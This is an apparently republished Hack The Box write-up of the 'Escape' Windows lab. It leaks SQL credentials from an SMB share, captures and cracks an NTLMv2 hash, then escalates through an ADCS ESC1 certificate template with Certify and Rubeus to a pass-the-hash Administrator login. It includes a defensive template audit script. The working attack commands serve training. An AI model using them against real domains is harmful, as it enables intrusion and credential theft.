Escape Windows Machine Writeup from Hackthebox
Summary: the article describes a penetration test of a Windows machine on Hack The Box. After discovering open ports and services with nmap, the author obtains SQL Server credentials from a PDF in an SMB share, captures an NTLMv2 hash with Responder and cracks the password. User access follows via Evil-WinRM, and ADCS is then abused to escalate to Administrator and read the flag.

2026-1-2 05:12:28 Author: infosecwriteups.com (view original) Views: 3


Escape Windows Machine from Hack The Box.

As we get deep into this engagement, I’ll demonstrate my penetration testing methodology and my thoughts while exploiting and scanning the target, where I perform various techniques and go through trial and error while pentesting.

INITIAL RECONNAISSANCE

As always, before we start enumeration or scanning we must check that the target is up and running by sending ICMP echo requests to it, i.e. pinging it with the following command:


Sending ICMP Requests to check that the target is up and running.

Next we scan with nmap for open ports and the services used:

nmap -sC -sV 10.129.228.253 -Pn -oA initial

Completed NSE at 16:05, 0.00s elapsed
Nmap scan report for 10.129.228.253
Host is up (0.040s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-13 05:04:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-13T05:05:30+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-13T05:05:31+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-13T04:50:58
| Not valid after: 2055-10-13T04:50:58
| MD5: d019:6a38:fa4f:5b3c:353a:44f4:c8dd:3064
|_SHA-1: a40f:bfee:dd73:bb77:a7d0:23b4:43d7:2343:cfa0:2249
|_ssl-date: 2025-10-13T05:05:30+00:00; +8h00m01s from scanner time.
| ms-sql-ntlm-info:
| 10.129.228.253:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.129.228.253:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-13T05:05:31+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-13T05:05:31+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-10-13T05:04:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s

IDENTIFICATION
PORTS EXAMINATION AND ENUMERATION:

netexec smb 10.129.228.253:


By identifying the SMB version and enumerating, we can see that the version and build of the target is:

Windows 10 / Server 2019 Build 17763 x64 domain:sequel.htb

Next, let's list the shares:

smbclient -N -L //10.129.228.253


After a little bit of enumeration I’ve found an interesting clue:


From this share I found a PDF, SQL Server Procedures.pdf, which seemed interesting to examine.

The PDF mentions that there were incidents on the SQL Server, and the following username and password are noted:

For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .
Refer to the previous guidelines and make sure to switch t

Since we have a lead from the PDF file, I'm going to skip ahead to the SQL Server approach and only come back to the other services if it doesn't work out.

PORT 135/TCP:
RPC

PORT 139/TCP:
SMB over NetBIOS

PORT 3269/TCP:
Microsoft Global Catalog SSL

PORT 593/TCP:
RPC Mapper Service

PORT 389/TCP:
LDAP

PORT 88/TCP:
Kerberos

PORT 636/TCP:
LDAP / LDAPS

PORT 1433/TCP:
Microsoft SQL Server

PORT 464/TCP:
Kerberos

PORT 3268/TCP:
Microsoft Global Catalog

Dissecting Microsoft SQL Server Port and Service:

PORT 1433/TCP:
Microsoft SQL Server

nmap scan:

└──╼ [★]$ nmap -sS -p 1433 10.129.228.253 -oA SQL
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-12 17:17 CDT
Nmap scan report for sequel.htb (10.129.228.253)
Host is up (0.041s latency).

PORT STATE SERVICE
1433/tcp filtered ms-sql-s

SQL Enumeration:

Bug in ms-sql-dac: no string output.
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
|_ 10.129.228.253:1433:
| ms-sql-hasdbaccess:
| 10.129.228.253:1433:
|_ ERROR: No login credentials.
| ms-sql-config:
| 10.129.228.253:1433:
|_ ERROR: No login credentials
| ms-sql-info:
| 10.129.228.253:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.228.253:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-dump-hashes:
|_ 10.129.228.253:1433: ERROR: No login credentials
| ms-sql-xp-cmdshell:
|_ (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
| ms-sql-tables:
| 10.129.228.253:1433:
| [10.129.228.253:1433]
|_ ERROR: No login credentials.

Using Metasploit Modules for enumeration and discovery:


This method didn't turn up anything useful, so next I'd use sqlcmd to access the SQL database with the credentials given in the PDF file:

sqlcmd -S 10.129.228.253 -U PublicUser -P GuestUserCantWrite1

This command wasn't ideal; the better tool is mssqlclient from Impacket, which we can use with the following command:

└──╼ [★]$ /usr/bin/impacket-mssqlclient  sequel.htb/PublicUser:[email protected]

Login to MSSQL:

Next I’d enumerate the databases with the following command:


INITIAL ACCESS:

Next I'd use Responder to capture NTLM challenge/response authentication, with the following steps:

Now we are listening for events; let's trigger it next:

And there we go, an NTLMv2-SSP hash was captured:

Yush! Password cracked! The password for that hash was REGGIE1234ronnie, which belongs to the sql_svc user:

Next I'd use the credentials to access the Windows machine via Evil-WinRM as follows:

After digging a bit into the files on the box, I found an interesting file called ERRORLOG.BAK:

To read it I'd type: ```type ERRORLOG.BAK```

By examining the log file I found a possible password:

NuclearMosquito3

Let's try to log in as the Ryan user on the machine via Evil-WinRM by providing these credentials:

And there we go, a shell as Ryan.Cooper via Evil-WinRM.

Next, to get admin, I'd do some enumeration using netexec:

sudo netexec ldap 10.129.228.253 -u ryan.cooper -p NuclearMosquito3 -M adcs


ADCS 10.129.228.253 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.129.228.253 389 DC Found CN: sequel-DC-CA

I found out that ADCS is running, which means we can use Certipy to enumerate the certificate service and look for abusable templates:

Next I'd run Certify to find templates that are vulnerable from the current user's perspective:

.\Certify.exe find /vulnerable /currentuser

The output of this command is:

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.9711246
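The Certify output above shows why this template is flagged: every ESC1 precondition holds at once. As an added defensive check that is not part of the original writeup, the following Python audits those preconditions against the UserAuthentication template as listed above and shows which change clears the finding; the template dict, its key names and the well-known SID lists are this example's own construction.

```python
import copy

# Constructed from the Certify output for the UserAuthentication template
# above; the dict layout and key names are this example's own, not Certify's.
DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"
USER_AUTH_TEMPLATE = {
    "name": "UserAuthentication",
    "name_flags": {"ENROLLEE_SUPPLIES_SUBJECT"},
    "enrollment_flags": {"INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"},
    "authorized_signatures": 0,
    "ekus": {"Client Authentication", "Encrypting File System", "Secure Email"},
    "enroll_sids": {DOMAIN_SID + "-512", DOMAIN_SID + "-513", DOMAIN_SID + "-519"},
}

# Principals that every domain account is effectively a member of.
LOW_PRIV_WELL_KNOWN = {"S-1-5-11", "S-1-1-0"}   # Authenticated Users, Everyone
LOW_PRIV_RID_SUFFIXES = ("-513", "-515")        # Domain Users, Domain Computers
# EKUs that let the issued certificate be used for domain logon (PKINIT).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
             "PKINIT Client Authentication", "Any Purpose"}

def is_low_priv(sid):
    return sid in LOW_PRIV_WELL_KNOWN or sid.endswith(LOW_PRIV_RID_SUFFIXES)

def esc1_conditions(t):
    """Map each ESC1 precondition to whether this template satisfies it."""
    return {
        "enrollee supplies subject": "ENROLLEE_SUPPLIES_SUBJECT" in t["name_flags"],
        "no manager approval": "PEND_ALL_REQUESTS" not in t["enrollment_flags"],
        "no authorized signatures": t["authorized_signatures"] == 0,
        # An empty EKU list means "any purpose", which also permits logon.
        "usable for authentication": not t["ekus"] or bool(AUTH_EKUS & t["ekus"]),
        "low-privileged enrollment": any(is_low_priv(s) for s in t["enroll_sids"]),
    }

def is_esc1(t):
    """A template is ESC1 only when every precondition holds at once."""
    return all(esc1_conditions(t).values())

def hardened(t):
    """Remediation: stop enrollees choosing their own subject/SAN and drop
    low-privileged principals from the enrollment ACL; returns a modified copy."""
    fixed = copy.deepcopy(t)
    fixed["name_flags"].discard("ENROLLEE_SUPPLIES_SUBJECT")
    fixed["enroll_sids"] = {s for s in fixed["enroll_sids"] if not is_low_priv(s)}
    return fixed

if __name__ == "__main__":
    for label, tmpl in (("as found", USER_AUTH_TEMPLATE), ("hardened", hardened(USER_AUTH_TEMPLATE))):
        print(label, "-> ESC1" if is_esc1(tmpl) else "-> ok", esc1_conditions(tmpl))
```

Either remediation alone (removing the flag, or removing Domain Users from enrollment) is enough to break the pattern, since all five conditions must hold together.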

Next I'd request a certificate from the UserAuthentication template with the following command:

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

Next, as outlined in Certify's output, I would convert the certificate with the following command:

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Next I'll upload Rubeus.exe and the converted cert.pfx file to the target and run Rubeus to get a TGT as Administrator:

.\Rubeus.exe asktgt /user:administrator /certificate:C:\Programdata\cert.pfx /password:1234

Ownership:

Next I'd run Rubeus again with /getcredentials to retrieve the Administrator NTLM hash:

.\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap /password:1234

As we can see here, the NTLM hash is shown at the end:

Next I'd access the box with the Administrator NTLM hash (pass-the-hash) using the following command:

evil-winrm -i 10.129.228.253 -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

And here we can find the root file and read it to get the flag:


Thank you all for reading my writeup and hope you learned something and found my steps useful, if you like to support my journey, please clap and share this article.

Appreciate you all.


Source: https://infosecwriteups.com/as-we-get-deep-into-this-engagement-ill-demonstrate-my-penetration-testing-methodology-and-my-198e597a3c9b?source=rss----7b722bfd1b8d---4